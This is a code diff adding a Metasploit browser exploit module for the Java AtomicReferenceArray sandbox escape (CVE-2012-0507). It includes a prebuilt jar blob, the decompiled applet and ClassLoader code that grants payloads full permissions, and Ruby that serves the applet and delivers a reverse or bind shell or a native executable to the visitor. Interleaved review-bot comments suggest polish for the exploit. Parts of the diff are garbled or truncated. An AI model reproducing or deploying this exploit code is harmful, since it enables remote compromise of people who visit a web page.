zC6p}y=bXra+JC$vNM=noulSG}>rvq3+V1HOi)YGPZ&w{&|4{wC$+5cMFf@0ba2+D> zvLquokshoAmX z0Vt&W+_s++Hu{R+L8@z@@;-Yh&Ktq+#L3e!yui$9b=<-=n;z%0Va)oaQ*8pd(RFP#Z!UBj-d=#zOhru&#KItI+Q6#%GK3I`vXXd#SV*b z&t{eA!hI@ZWI)`0suBz@UL4{e$xYO!rDR^o$Iu0Hh@jF?=r<}mXdy3pt4f$x*MvxN zQjcLhX#G^o`_xPYnT5iNvNJ3hHeK>q7g4YwuEOnxkj1I2Ct!eVN-&0qS+(p$o8lLd zPEu7AKuKTtfDN;7ib4}5fvMlxS9Aa5_O2=Fy~-yVpW4_3kbUSXR{QCOSd@PF85w8n z%NL)Y=-yAJEjLfo=;OG+B8#_*-ypjc$qh!6!oIAlU9Bz?jz+B>jKMNccAn+Sj45<6@R(0# zu3Ddq;@INxS{={4Lqw50nW3Y6#Lmjf!spz&_2-YZ$$nngHd|JYU+-;rXL?Ko{cKs2 z@ZSi!;Xo5|osyw05MIBxVEKYcv`A^t_uj-Hb_9w*if=qZoOi~p3Bh;R*|(LUDq?0^ zMD=vet?MgIS(n^krl;eKTiM}{W<(A6%7JbX)@dNsAmj?F&)mO9_jKB=G%}YU+^q#+ z>bd6NI%-SU0qmsn9=gfDhv+q*S>r)USZ{04T_1KD4jSSM;9mn#)NgqQIu22h?43_@ za6AKa2g3w^CLvsoe2fMS=vIZlQm3u(jz6NNpHEH>`^?Xe^Fo|n=nDw0(qcRausVUz zY1;d&$i&@m+XC7bh&1YHyd8b-foeyb!VVW3O_AQ@4@~#F+S6h16o|x*SbgYnuV#ms zbJ;B1go&z6Qk7}$)qsheNMD_`9j1cS@C0i_w+IFH`L4OfN~+Xe=O_I*Ic@l)yPZWM zn+dC4pwZipW4?NupTJJNumqM9h4mQy_Sb7Bv4XmAV)6WN~3o67qB&zu9n;o+1 z`)d}6y;CEfd?f_x@KZQOFLChgGh@Gb(}Q4FV;H|_tYWDLG|k#qFV|>wZY20#^=1`i zfnv9^FRBgL$;M(?pc^q@edD&!aL&V)hi7YfO=Cy!M`Cmes^e_u=Zu&NJ0B+L8){aerB|y4I zQ~icO+K^pUyv=fENyg@K``ZJS-XmU9M+d?htKmpb%6BW!;mQ^%ryWWZOH?wrwLp+n z9ILY_ni$!|4?JDfT(Lk3uA1Au9?csvSru}-H$is)o#5H?8%0Y;xJcerCQ@TW!yrj@ 
z^5hI1)e@h}WFsbmdy}#1uA|LnZ#cFMJOoM{<)`K%%2H>a6g~!+M{}sDzchU82%~bH zYn4w4wY1#v_CfZYp5X|bmB&cq8SfI!=XyknZF=c&p!fd$YCM3iA_=)cFG7@49Y?^g zNHv55ZpO0H1YS5;X@r4`gKfEQFNl!#MXu;Am8%!X z^G(*fu%FG0C@FOtK!qr+TU}aAM^j?tYPK|nQyasb4bqMK^OerJMTQ07#~C8VJ7TC? zqe2de4mjO@v7do*da!OTIm3s?5@jppv0A7CU>v{VPlq1EDrXT7=$)OJ{riH+@>1lH zPm90GM+6h^z?)}}&u4QlYZ+&3x;*T8jFxrgB}0+6^+qI<87fo>UIQ;l4MaPl=Uh#n z*iUL`<24VVAGp zs|eJU;CcPb1lMb6Xo`}i}Yi)HlXoHo}(=bdF7GC~`V*+a@G zKEts`9n3gk5EZX^#u_9=bj z-FSkZ8a(vk^0_S9`dcQonYhy3`&?;;6F=EsjY8&?xGBLWohQq0n}r@QNqS4;@rMbw z3Ut@^IR3Oxbx=4oE z7j!1QcHAHUp^pSMRlT2RHxf0s%e9>Y^}gJ;lHrXKgNxTP0@x@eRNsV|tXM?cFNQS8wweph~=7%7bxInYRy{es8GjrfMt`-sa)`SVgdJ+X>v-s_@?t!-=%dh&SwS8RjB~M zFsPhRGeN8VqE0Q*pslOf<@>vAv(o*UsfvKA=Hkg=AT5KqWpKCsiD?oswD67!nt+VA zH-;LkxD0-ftx*@N5u0~kvp1Oi(A0j?@_O%aqE?J=u>bY!`H;#_S0m zs0b4MVA12|m?>j-n22x}TB{I1)c{dKRObn6zNFlU5)ft0beP6nVDz?}l%VKC zgu3#M$xBy!!_%-h9F%-zX3QD;!Y<^_c||qG&<%YPgYw+Qn`GmCe?YfcXjrFSLjRtF zplEefr`)_{YEBH7K2E)kwppF?fJl7vaW>>}W#C$+#en)pueFkmUfWAiXM8L-K23K! znL+aq(lxrQXnzcHFyoO_g^NbHBOv~?+L4HXe z91tNt#QcJv5oig?bxdR7spXt_hda-}#3m{IV(tR|3?Q!Kx z(e@;~G4q(ueNalyCj{L6A(u~fi;*q;o)Y!W6cCCDLfG*ILFeJHo5gQW4NUwN;A$HK z_ItT_-}Dk}BoMs-`}%msiOb`BBwhc?J6hBqIoKz^J`OotG&FkR|CECf{mQ{C z`4oIy9bN1_|2zFMSoHwtQ~h-E5L>n3a0-@dWFO*D4{>yUt&Xpp!m6XL%5p!lq?uV2 z_vLbyBT09dPd`m;>0-Te}&&thxJ;-74xqv@amO4f)-X;S82TFuqc zo%URboNOVU8xnm?Y+x(@FqI_zh9qwXzs5e6Z|oMv)SN%_keQH_x$Xfmx0=)mdEz<+ zSWHd7ln?}rCJpAoX)}@(C8k#H4~rp-Qqotjr{$tjcSXzrizu>3)6t~+GYX2i#*cFL zVhbVoGs`;GtlZD~Z@|o~v1Os!>1Pxh6kBZ_akkH{x1ov~)ZB)w+`Yi>ox%0{^n7(b zZPkT-&rAm-Ks@rYNsI4+8*jLFxi%Eg3@D1RQp%q$OO4#NCQhpIZJ{El2ufPchZf^VI`HLRT4R>od z#o8JV5P{U2jzf;BDYu#|{mOI%Yh~8xv0A^-h#suX8fv~jH#Tm5x#$4YW&3^<`go}b zGR&T6taOqqr9670{f3$?S7Y;;x4VWBWM%q-Vi8Ur3zekKDsBGuK_|r-&_j$b|C`Xxd8D! 
zS{74fan=18tX2{I9AQ67PSJMdb?x1*qpyU#@li@VsdXe)o@nP>1@h6Zgy>Y?A zYS0+&d22vq5lN^hu0y$Ny%Ac?7yT+VKcWjYboiJG&S-|fKq(oQUz_dJdC;5>582qQ z?PX^$)6084qry7EMzk!qp|5o!`WMGOWC{$H8!>R-E-pl zDX>hiA1=>a2NL39!}Zfa4aw6vj5c-9P};Bm-FOVt?tS*n2Icq4j3vmB4smsL?An}q z$9qt`|8eTu8#_}I){4N>Z!xW=jtu!<%P~iX1KBdHu%Dpv48TAoU+!a5= z2Iru6wCZ5R;huTFM&X-@MGfYUi#_4a_3-U;oH(%`-_KGS*#}RSIM%P9Bv;uL^e>O8 zx9-(j4ktkeKNgr~PB(Sgc~v5=ZtduLKg<S zn=KiMaW@5Q-`Jn_i%)(R7jY5d9oK#C0y{YbfpDj}o(>KiFA2xA6EOLIJY@Yu zE@A5JmUtH+43m^;MSso?IgWmNxfDaVq_E2`S}apZ{mLz}IS6qc6f)Ee*0W$8XMpT- zvRvIGx#Q~XlxN;#!M`rrA%das1tiERx8Ej8MY4yfEE|a{JU#3uFp=+_8f{GJ86}3& zE=)E$mG{`-w+nrOwQ^KfDjC2hbt%d#t*~bH*L6t+nr3;+Q9-}kYNo^^Vt3eRXo7hE z2|5V=fDUCFN7w(sjb)Ej@GsnW(7?@=38>Ilja~if>IWt+A}hm*Np0nrkX;`QS8Yny zt9k@9wNJ(1Q7YE@obg%1oz>$h%NBTPh1*C}RMZ1a1@HFy8ihb$#>t z$3*(qi%sb@^r?^r8(6gaSLMU>DYosRaCzEWK~Ra{gIxij0KpJdU(yl{1#*{GiMh{a zZijtP0I@3=8oC!A&st2;2SH#B0t6SVzys8h9Hn%c-_C>!wtWl~@k>Yv1QPKuAxve~ zSyZX~yl@RjBeR+^h{wPlnA+IC1CyS8KU4FT2hZ}X%8wKyF+6wgK zpUXTKa?Bb_Xw&Q<43>OQwj8l|YX>HF@@fURZ;7(9X zy4D*QcM!e@TNkQdP9LWhlGk;%9pRaB&C~rNX;Cyp)*XF8mKBQc1L+y{QRu1Z94hi5 zXg_ioMD$U;6o@rg6jld+qmKAMcQE!rZ^7NJ^<}nK8$01bR=Tj+NZc!0en(rjI2BDGJxrApnsD< zhSzCQCKl&y=Me=t%_FBKQc=Mv<={uQ6QhBK&LLGiI-k|F{kycSDoex^V&dXGJ1%Df zG8|Nz+)S?hJA}5xZXyhN}xLpNo8Fv!Nh6@3{^+XFdm~B~0KH zY5k1jRO(TxfRoBX{d}B$prvxM?l4XQq*`0|C9M+LuouNfU;@_?Yh=7p*@;}xrLpaI z-nF3|=)=?;95ycWRmoMC12d#XMwbq3bHe62Fk6a+%}&R?U16kc#2dU95PsSLDf7i9 zZ_u=fwRu0b7w-n3Ir69q*_QgQVmPJt6o;CjNFRSZe*fc1%d^LjXFf@ag&oUi()7Kb zF!+FhHiA^i#2a*E#kW8B1 zPL`t(I$xAN{kiuCrehI@1nQwjNlSHRN^dx8LPnBOqTHc(kM$=?6^X`*MM-LN72a5w z`qB{kt<#3~EmkhpTzbGB3ZyAr&@M3VH;NW7REO)&e>bk3rD?B`YL?G)*g~u%4f>hu zun0Ebyc>Mt0b|-D?D4<2U(+KgI+Hh8E@{H|eL3MYx#O$>*Sd6$-T&JgvV@`}jXjdvpvkw7+vO|3k3+=3xFV|0Y#_GcsDL ze^>o0CGxw|`=>nlHT}2hU-+26TKG+!{I!exn>zVZ27XQd-Z}oiiIjg@{A*40cc11l z|7r1Gp!QD-e}%^1wbP$sO!&VlsedYe`pcL8jh=r>8sN9`pIEA;ihb|*>b+kh8XXNS J6!`n@zW`)iUNisz literal 0 HcmV?d00001 
diff --git a/external/source/exploits/CVE-2012-0507/Exploit.java b/external/source/exploits/CVE-2012-0507/Exploit.java
new file mode 100644
index 0000000000..3a1f899b9e
--- /dev/null
+++ b/external/source/exploits/CVE-2012-0507/Exploit.java
@@ -0,0 +1,58 @@
+package a;
+
+import java.applet.Applet;
+import java.io.ByteArrayInputStream;
+import java.io.ObjectInputStream;
+import java.util.concurrent.atomic.AtomicReferenceArray;
+import a.*;
+
+// Referenced classes of package a:
+// Help
+
+public class Exploit extends Applet
+{
+
+ public Exploit()
+ {
+ }
+
+ public static byte[] StringToBytes(String s)
+ {
+ byte abyte0[] = new byte[s.length() / 2];
+ for(int i = 0; i < s.length(); i += 2)
+ abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16));
+
+ return abyte0;
+ }
+
+ public void init()
+ {
+ try
+ {
+ String as[] = {
+ "ACED0005757200135B4C6A6176612E6C616E672E4F62", "6A6563743B90CE589F1073296C020000787000000002", "757200095B4C612E48656C703BFE2C941188B6E5FF02", "000078700000000170737200306A6176612E7574696C", "2E636F6E63757272656E742E61746F6D69632E41746F", "6D69635265666572656E63654172726179A9D2DEA1BE", "65600C0200015B000561727261797400135B4C6A6176", "612F6C616E672F4F626A6563743B787071007E0003"
+ };
+ StringBuilder stringbuilder = new StringBuilder();
+ for(int i = 0; i < as.length; i++)
+ stringbuilder.append(as[i]);
+
+ ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(StringToBytes(stringbuilder.toString())));
+ Object aobj[] = (Object[])(Object[])objectinputstream.readObject();
+ Help ahelp[] = (Help[])(Help[])aobj[0];
+ AtomicReferenceArray atomicreferencearray = (AtomicReferenceArray)aobj[1];
+ ClassLoader classloader = getClass().getClassLoader();
+ atomicreferencearray.set(0, classloader);
+ Help _tmp = ahelp[0];
+
+ String data = getParameter( "data" );
+ String jar = getParameter( "jar" );
+ String lhost = getParameter( "lhost" );
+ String lport = getParameter( "lport" );
+ System.out.println("go go go");
+ Help.doWork(ahelp[0], this, data, jar, lhost, ( lport == null ? 4444 : Integer.parseInt( lport ) ));
+ }
+ catch(Exception exception) {
+ System.out.println(exception.getMessage());
+ }
+ }
+}
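Review bot: This file reads as decompiler output rather than maintained source (`abyte0`, the unused `Help _tmp = ahelp[0];`, the doubled `(Object[])(Object[])` casts, and `import a.*;` inside package `a`), and the commit's diffstat adds `data/exploits/CVE-2012-0507.jar` as a prebuilt binary with no build file, so a reviewer cannot confirm that the shipped jar was built from this source. I would add a header comment recording provenance and the toolchain, for example `// Source origin: <sample or author>; built with javac <version> into data/exploits/CVE-2012-0507.jar`, and check in the build script next to it. The hex literal in `init()` is passed to `ObjectInputStream.readObject()` with no comment saying what object graph it encodes; a short comment listing the classes it contains would let it be audited without deserializing it.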
diff --git a/external/source/exploits/CVE-2012-0507/Help.java b/external/source/exploits/CVE-2012-0507/Help.java
new file mode 100644
index 0000000000..f340a77161
--- /dev/null
+++ b/external/source/exploits/CVE-2012-0507/Help.java
@@ -0,0 +1,82 @@ +package a; + +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.io.InputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.io.Serializable; +import java.net.URL; +import java.security.AllPermission; +import java.security.CodeSource; +import java.security.Permissions; +import java.security.ProtectionDomain; +import java.security.cert.Certificate; +import java.lang.reflect.Field; + +public class Help extends ClassLoader implements Serializable{ + public static void doWork(Help h, Exploit expl, String data, String jar, String lhost, int lport) { + + String classNames[] = { "msf.x.PayloadX$StreamConnector", "msf.x.PayloadX" }; + String classPaths[] = { "/msf/x/PayloadX$StreamConnector.class", "/msf/x/PayloadX.class" }; + Class cls = null; + + try + { + for( int index=0 ; index 0 ) + bos.write( buffer, 0, length ); + // convert it to a simple byte array + buffer = bos.toByteArray(); + + URL url = new URL( "file:///" ); + + Certificate[] certs = new Certificate[0]; + + Permissions perm = new Permissions(); + perm.add( new AllPermission() ); + + ProtectionDomain pd = new ProtectionDomain( new CodeSource( url, certs ), perm ); + + cls = h.defineClass( classNames[index], buffer, 0, buffer.length, pd ); + Class class_cls = cls.getClass(); + System.out.println("The type of the object is: " + class_cls.getName()); + } + + // cls will end up being the PayloadX class + if( cls != null ) + { + // reflect into the PayloadX class to get these three fields + Field payload_data = cls.getField( "data" ); + Field payload_jar = cls.getField( "jar" ); + Field payload_lhost = cls.getField( "lhost" ); + Field payload_lport = cls.getField( "lport" ); + + // instantiate the PayloadX object once so as we can set the native payload data + Object obj = cls.newInstance(); + + // set the native payload data, lhost and lport + payload_data.set( obj, data ); + payload_jar.set( obj, jar ); + payload_lhost.set( 
obj, lhost ); + payload_lport.setInt( obj, lport ); + + // instantiate a second PayloadX object to perform the actual payload + obj = cls.newInstance(); + } + } + catch( Exception e ) { + System.out.println(e.getMessage()); + } + } +} + diff --git a/modules/exploits/multi/browser/java_atomicreferencearray.rb b/modules/exploits/multi/browser/java_atomicreferencearray.rb new file mode 100644 index 0000000000..1ce83d4457 --- /dev/null +++ b/modules/exploits/multi/browser/java_atomicreferencearray.rb 
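Review bot: The debug line `System.out.println("The type of the object is: " + class_cls.getName());` in `doWork` can only ever print `java.lang.Class`, because `class_cls` is `cls.getClass()` rather than `cls`. Either drop both lines or print `cls.getName()`. The comment above the reflection block says "these three fields" while four are fetched (`data`, `jar`, `lhost`, `lport`); it should read `// reflect into the PayloadX class to get these four fields`. The loop header and the stream-reading lines are garbled in this rendering of the hunk, so they are not reviewed here.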
@@ -0,0 +1,173 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::EXE + + def initialize( info = {} ) + + super( update_info( info, + 'Name' => 'Java AtomicReferenceArray Type Violation Vulnerability', + 'Description' => %q{ + This module exploits a vulnerability due to the fact that + AtomicReferenceArray uses the Unsafe class to store a reference in an + array directly, which may violate type safety if not used properly. + This allows a way to escape the JRE sandbox, and load additional classes + in order to perform malicious operations. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'sinn3r', # metasploit module + 'juan vazquez' # metasploit module + ], + 'References' => + [ + ['CVE', '2012-0507'], + ['BID', '52161'], + ['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'], + ['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'], + ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507'] + ], + 'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ], + 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, + 'Targets' => + [ + [ 'Generic (Java Payload)', + { + 'Platform' => ['java'], + 'Arch' => ARCH_JAVA, + } + ], + [ 'Windows x86 (Native Payload)', + { + 'Platform' => 'win', + 'Arch' => ARCH_X86, + } + ], + [ 'Mac OS X PPC (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_PPC, + } + ], + [ 'Mac OS X x86 (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_X86, + } + ], + [ 'Linux x86 (Native Payload)', + 
{ + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 14 2012' + )) + end + + + def exploit + # load the static jar file + path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0507.jar" ) + fd = File.open( path, "rb" ) + @jar_data = fd.read(fd.stat.size) + fd.close + + super + end + + + def on_request_uri( cli, request ) + data = nil + host = nil + port = nil + peer = "#{cli.peerhost}:#{cli.peerport}" + + if not request.uri.match(/\.jar$/i) + if not request.uri.match(/\/$/) + send_redirect( cli, get_resource() + '/', '') + return + end + + print_status("#{peer} - Sending #{self.name}") + + payload = regenerate_payload( cli ) + if not payload + print_error("#{peer} - Failed to generate the payload." ) + return + end + + if target.name == 'Generic (Java Payload)' + if datastore['LHOST'] + jar = payload.encoded + host = datastore['LHOST'] + port = datastore['LPORT'] + vprint_status("Java reverse shell to #{host}:#{port} from #{peer}" ) + else + port = datastore['LPORT'] + datastore['RHOST'] = cli.peerhost + vprint_status( "Java bind shell on #{cli.peerhost}:#{port}..." ) + end + if jar + print_status( "Generated jar to drop (#{jar.length} bytes)." ) + jar = Rex::Text.to_hex( jar, prefix="" ) + else + print_error("#{peer} - Failed to generate the executable." ) + return + end + else + + # NOTE: The EXE mixin automagically handles detection of arch/platform + data = generate_payload_exe + + if data + print_status("#{peer} - Generated executable to drop (#{data.length} bytes)." ) + data = Rex::Text.to_hex( data, prefix="" ) + else + print_error("#{peer} - Failed to generate the executable." ) + return + end + + end + + send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } ) + return + end + + print_status( "#{peer} - sending jar to ..." 
) + send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } ) + + handler( cli ) + end + + def generate_html( data, jar, host, port ) + html = "" + html += "" + html += "" + html += "" if data + html += "" if jar + html += "" if host + html += "" if port + html += "" + return html + end + + def generate_jar() + return @jar_data + end + +end
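Review bot: `exploit` opens the jar with `File.open` and closes it by hand, so an exception raised by `fd.read` leaves the descriptor open. The block form, `@jar_data = File.open( path, "rb" ) { |fd| fd.read }`, closes it on every path and makes the `fd.stat.size` call unnecessary. In `on_request_uri`, `Rex::Text.to_hex( jar, prefix="" )` and the matching call on `data` assign a throwaway local named `prefix` and pass its value positionally. `Rex::Text.to_hex( jar, "" )` states what actually happens. The string literals in `generate_html` are empty in this rendering, so that method is not reviewed here.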